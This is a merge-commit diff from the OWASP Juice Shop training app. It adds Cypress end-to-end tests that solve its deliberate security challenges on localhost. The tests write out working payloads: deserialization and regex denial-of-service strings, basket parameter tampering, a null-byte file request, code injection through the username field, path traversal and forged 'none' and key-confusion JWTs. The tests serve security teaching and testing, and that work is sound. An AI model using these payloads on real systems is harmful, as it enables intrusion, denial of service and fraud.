Merge remote-tracking branch 'origin/develop' into develop

oguzhalit · Jun 29, 2022 · c35f924 · c35f924
2 parents ff67696 + b022962
commit c35f924
Show file tree

Hide file tree

Showing 26 changed files with 873 additions and 781 deletions.
diff --git a/.github/CODEOWNERS b/.github/CODEOWNERS
@@ -1,2 +1 @@
 /vagrant/ @wurstbrot
-/.github/workflows/lint-fixer.yml @J12934
diff --git a/.github/FUNDING.yml b/.github/FUNDING.yml
@@ -1 +1,2 @@
 custom: https://sponsor.owasp-juice.shop
+github: OWASP
diff --git a/config/default.yml b/config/default.yml
@@ -82,7 +82,7 @@ challenges:
  showFeedbackButtons: true
 hackingInstructor:
  isEnabled: true
- avatarImage: JuicyBot_MedicalMask.png
+ avatarImage: JuicyBot.png
  hintPlaybackSpeed: normal # Options: faster fast normal slow slower
 products:
  -

diff --git a/cypress.json b/cypress.json
@@ -1,4 +1,7 @@
 {
  "baseUrl": "http:https://localhost:3000",
- "defaultCommandTimeout": 10000
-}
+ "defaultCommandTimeout": 10000,
+ "env": {
+ "baseUrl": "http:https://localhost:3000"
+ }
+}
diff --git a/cypress/integration/e2e/b2bOrder.spec.ts b/cypress/integration/e2e/b2bOrder.spec.ts
@@ -0,0 +1,71 @@
+describe("/b2b/v2/order", () => {
+ describe('challenge "rce"', () => {
+ it("an infinite loop deserialization payload should not bring down the server", () => {
+ cy.task("disableOnContainerEnv").then((disableOnContainerEnv) => {
+ if (!disableOnContainerEnv) {
+ cy.login({ email: "admin", password: "admin123" });
+
+ cy.window().then(() => {
+ var xhttp = new XMLHttpRequest();
+ xhttp.onreadystatechange = function () {
+ if (this.status == 500) {
+ console.log("Success");
+ }
+ };
+ xhttp.open(
+ "POST",
+ `${Cypress.env("baseUrl")}/b2b/v2/orders/`,
+ true
+ );
+ xhttp.setRequestHeader("Content-type", "application/json");
+ xhttp.setRequestHeader(
+ "Authorization",
+ `Bearer ${localStorage.getItem("token")}`
+ );
+ xhttp.send(
+ JSON.stringify({
+ orderLinesData: "(function dos() { while(true); })()",
+ })
+ );
+ });
+ cy.expectChallengeSolved({ challenge: "Blocked RCE DoS" });
+ }
+ });
+ });
+ });
+
+ describe('challenge "rceOccupy"', () => {
+ it("should be possible to cause request timeout using a recursive regular expression payload", () => {
+ cy.task("disableOnContainerEnv").then((disableOnContainerEnv) => {
+ if (!disableOnContainerEnv) {
+ cy.login({ email: "admin", password: "admin123" });
+ cy.window().then(() => {
+ var xhttp = new XMLHttpRequest();
+ xhttp.onreadystatechange = function () {
+ if (this.status == 503) {
+ console.log("Success");
+ }
+ };
+ xhttp.open(
+ "POST",
+ `${Cypress.env("baseUrl")}/b2b/v2/orders/`,
+ true
+ );
+ xhttp.setRequestHeader("Content-type", "application/json");
+ xhttp.setRequestHeader(
+ "Authorization",
+ `Bearer ${localStorage.getItem("token")}`
+ );
+ xhttp.send(
+ JSON.stringify({
+ orderLinesData:
+ "/((a+)+)b/.test('aaaaaaaaaaaaaaaaaaaaaaaaaaaaa')",
+ })
+ );
+ });
+ cy.expectChallengeSolved({ challenge: "Successful RCE DoS" });
+ }
+ });
+ });
+ });
+});
diff --git a/cypress/integration/e2e/basket.spec.ts b/cypress/integration/e2e/basket.spec.ts
@@ -0,0 +1,171 @@
+describe("/#/basket", () => {
+ describe("as admin", () => {
+ beforeEach(() => {
+ cy.login({ email: "admin", password: "admin123" });
+ });
+
+ describe('challenge "negativeOrder"', () => {
+ it("should be possible to update a basket to a negative quantity via the Rest API", () => {
+ cy.window().then(() => {
+ var xhttp = new XMLHttpRequest();
+ xhttp.onreadystatechange = function () {
+ if (this.status == 200) {
+ console.log("Success");
+ }
+ };
+ xhttp.open(
+ "PUT",
+ `${Cypress.env("baseUrl")}/api/BasketItems/1`,
+ true
+ );
+ xhttp.setRequestHeader("Content-type", "application/json");
+ xhttp.setRequestHeader(
+ "Authorization",
+ `Bearer ${localStorage.getItem("token")}`
+ );
+ xhttp.send(JSON.stringify({ quantity: -100000 }));
+ });
+ cy.visit("/#/order-summary");
+
+ // cy.get("mat-cell.mat-column-quantity > span").first().should("match",-100000)
+ cy.get("mat-cell.mat-column-quantity > span")
+ .first()
+ .then(($ele) => {
+ let quantity = $ele.text();
+ expect(quantity).to.match(/-100000/);
+ });
+ });
+
+ it("should be possible to place an order with a negative total amount", () => {
+ cy.visit("/#/order-summary");
+ cy.get("#checkoutButton").click();
+ cy.expectChallengeSolved({ challenge: "Payback Time" });
+ });
+ });
+
+ describe('challenge "basketAccessChallenge"', () => {
+ it("should access basket with id from session storage instead of the one associated to logged-in user", () => {
+ cy.window().then(() => {
+ window.sessionStorage.bid = 3;
+ });
+
+ cy.visit("/#/basket");
+
+ // TODO Verify functionally that it's not the basket of the admin
+ cy.expectChallengeSolved({ challenge: "View Basket" });
+ });
+ });
+
+ describe('challenge "basketManipulateChallenge"', () => {
+ it("should manipulate basket of other user instead of the one associated to logged-in user", () => {
+ cy.window().then(() => {
+ const xhttp = new XMLHttpRequest();
+ xhttp.onreadystatechange = function () {
+ if (this.status === 200) {
+ console.log("Success");
+ }
+ };
+
+ xhttp.open("POST", `${Cypress.env("baseUrl")}/api/BasketItems/`);
+ xhttp.setRequestHeader("Content-type", "application/json");
+ xhttp.setRequestHeader(
+ "Authorization",
+ `Bearer ${localStorage.getItem("token")}`
+ );
+ xhttp.send(
+ '{ "ProductId": 14,"BasketId":"1","quantity":1,"BasketId":"2" }'
+ ); //eslint-disable-line
+ });
+ cy.expectChallengeSolved({ challenge: "Manipulate Basket" });
+ });
+ });
+ });
+
+ describe("as jim", () => {
+ beforeEach(() => {
+ cy.login({ email: "jim", password: "ncc-1701" });
+ });
+ describe('challenge "manipulateClock"', () => {
+ it("should be possible to enter WMNSDY2019 coupon", () => {
+ cy.window().then(() => {
+ window.localStorage.couponPanelExpanded = false;
+ });
+ cy.visit("/#/payment/shop");
+
+ // yahan bt aa rahi in the console commands
+ cy.window().then((win) => {
+ cy.on("uncaught:exception", (err, runnable) => {
+ // Introduced to disbale the uncaught:exception we get after the eval under this as TypeError: Date.now is not a function
+ return false;
+ });
+ win.eval(
+ 'event = new Date("March 08, 2019 00:00:00"); Date = function(Date){return function() {date = event; return date; }}(Date);'
+ );
+ });
+ cy.get("#collapseCouponElement").click();
+
+ cy.get("#coupon").type("WMNSDY2019");
+ cy.get("#applyCouponButton").click();
+ });
+
+ it("should be possible to place an order with the expired coupon", () => {
+ cy.visit("/#/order-summary");
+ cy.get("#checkoutButton").click();
+ cy.expectChallengeSolved({ challenge: "Expired Coupon" });
+ });
+ });
+
+ describe('challenge "forgedCoupon"', () => {
+ it("should be able to access file /ftp/coupons_2013.md.bak with poison null byte attack", () => {
+ cy.request(`${Cypress.env("baseUrl")}/ftp/coupons_2013.md.bak%2500.md`);
+ });
+
+ it("should be possible to add a product in the basket", () => {
+ cy.window().then(() => {
+ var xhttp = new XMLHttpRequest();
+ xhttp.onreadystatechange = function () {
+ if (this.status === 201) {
+ console.log("Success");
+ }
+ };
+ xhttp.open(
+ "POST",
+ `${Cypress.env("baseUrl")}/api/BasketItems/`,
+ true
+ );
+ xhttp.setRequestHeader("Content-type", "application/json");
+ xhttp.setRequestHeader(
+ "Authorization",
+ `Bearer ${localStorage.getItem("token")}`
+ );
+ xhttp.send(
+ JSON.stringify({
+ BasketId: `${sessionStorage.getItem("bid")}`,
+ ProductId: 1,
+ quantity: 1,
+ })
+ );
+ });
+ });
+
+ it("should be possible to enter a coupon that gives an 80% discount", () => {
+ cy.window().then(() => {
+ window.localStorage.couponPanelExpanded = false;
+ });
+
+ cy.visit("/#/payment/shop");
+ cy.get("#collapseCouponElement").click();
+ cy.task("GenerateCoupon", 90).then((coupon: string) => {
+ cy.get("#coupon").type(coupon);
+ cy.get("#applyCouponButton").click();
+ });
+ });
+
+ it("should be possible to place an order with a forged coupon", () => {
+ cy.visit("/#/order-summary");
+ cy.get("#checkoutButton").click();
+ cy.expectChallengeSolved({ challenge: "Forged Coupon" });
+ });
+ });
+ });
+});
diff --git a/cypress/integration/e2e/chatbot.spec.ts b/cypress/integration/e2e/chatbot.spec.ts
@@ -0,0 +1,54 @@
+describe("/chatbot", () => {
+ beforeEach(() => {
+ cy.login({ email: "admin", password: "admin123" });
+ });
+
+ describe('challenge "killChatbot"', () => {
+ it("should be possible to kill the chatbot by setting the process to null", () => {
+ cy.visit("/profile");
+ cy.get("#username").type(
+ 'admin"); process=null; users.addUser("1337", "test'
+ );
+ cy.get("#submit").click();
+ cy.visit("/#/chatbot");
+
+ cy.get("#message-input").type("hi").type("{enter}");
+ cy.get("#message-input").type("...").type("{enter}");
+ cy.get("#message-input").type("bye").type("{enter}");
+
+ cy.expectChallengeSolved({ challenge: "Kill Chatbot" });
+ });
+ });
+
+ describe('challenge "bullyChatbot"', () => {
+ it("should be possible to make the chatbot hand out a coupon code", () => {
+ cy.task("GetCouponIntent").then(
+ (couponIntent: {
+ utterances: Array<string>;
+ intent: string;
+ answers: Array<{
+ action: string;
+ body: string;
+ }>;
+ }) => {
+ cy.visit("/profile");
+ cy.get("#username").type(
+ "admin\"); process=(query, token)=>{ if (users.get(token)) { return model.process(trainingSet.lang, query) } else { return { action: 'unrecognized', body: 'user does not exist' }}}; users.addUser(\"1337\", \"test",
+ { parseSpecialCharSequences: false }
+ );
+ cy.get("#submit").click();
+ cy.visit("/#/chatbot");
+
+ cy.get("#message-input").type("hi").type("{enter}");
+ cy.get("#message-input").type("...").type("{enter}");
+ for (let i = 0; i < 100; i++) {
+ cy.get("#message-input")
+ .type(couponIntent.utterances[0])
+ .type("{enter}");
+ }
+ cy.expectChallengeSolved({ challenge: "Bully Chatbot" });
+ }
+ );
+ });
+ });
+});
diff --git a/cypress/integration/e2e/dataErasure.spec.ts b/cypress/integration/e2e/dataErasure.spec.ts
@@ -0,0 +1,33 @@
+describe("/dataerasure", () => {
+ beforeEach(() => {
+ cy.login({ email: "admin", password: "admin123" });
+ });
+
+ describe('challenge "lfr"', () => {
+ it("should be possible to perform local file read attack using the browser", () => {
+ cy.window().then(() => {
+ const xhttp = new XMLHttpRequest();
+ xhttp.onreadystatechange = function () {
+ if (this.status === 200) {
+ console.log("Success");
+ }
+ };
+ const params = "layout=../package.json";
+
+ xhttp.open("POST", `${Cypress.env("baseUrl")}/dataerasure`);
+ xhttp.setRequestHeader(
+ "Content-type",
+ "application/x-www-form-urlencoded"
+ );
+ xhttp.setRequestHeader("Origin", `${Cypress.env("baseUrl")}/`);
+ xhttp.setRequestHeader(
+ "Cookie",
+ `token=${localStorage.getItem("token")}`
+ );
+ xhttp.send(params); //eslint-disable-line
+ });
+ cy.visit("/");
+ cy.expectChallengeSolved({ challenge: "Local File Read" });
+ });
+ });
+});
diff --git a/cypress/integration/e2e/forgedJwt.spec.ts b/cypress/integration/e2e/forgedJwt.spec.ts
@@ -0,0 +1,32 @@
+describe("/", () => {
+ describe('challenge "jwtUnsigned"', () => {
+ it("should accept an unsigned token with email [email protected] in the payload ", () => {
+ cy.window().then(() => {
+ localStorage.setItem(
+ "token",
+ "eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJkYXRhIjp7ImVtYWlsIjoiand0bjNkQGp1aWNlLXNoLm9wIn0sImlhdCI6MTUwODYzOTYxMiwiZXhwIjo5OTk5OTk5OTk5fQ."
+ );
+ });
+ cy.visit("/");
+ cy.expectChallengeSolved({ challenge: "Unsigned JWT" });
+ });
+ });
+
+ describe('challenge "jwtForged"', () => {
+ it("should accept a token HMAC-signed with public RSA key with email [email protected] in the payload ", () => {
+ cy.task("disableOnWindowsEnv").then((disableOnWindowsEnv) => {
+ if (!disableOnWindowsEnv) {
+ cy.window().then(() => {
+ localStorage.setItem(
+ "token",
+ "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjp7ImVtYWlsIjoicnNhX2xvcmRAanVpY2Utc2gub3AifSwiaWF0IjoxNTgzMDM3NzExfQ.gShXDT5TrE5736mpIbfVDEcQbLfteJaQUG7Z0PH8Xc8"
+ );
+ });
+ cy.visit("/#/");
+
+ cy.expectChallengeSolved({ challenge: "Forged Signed JWT" });
+ }
+ });
+ });
+ });
+});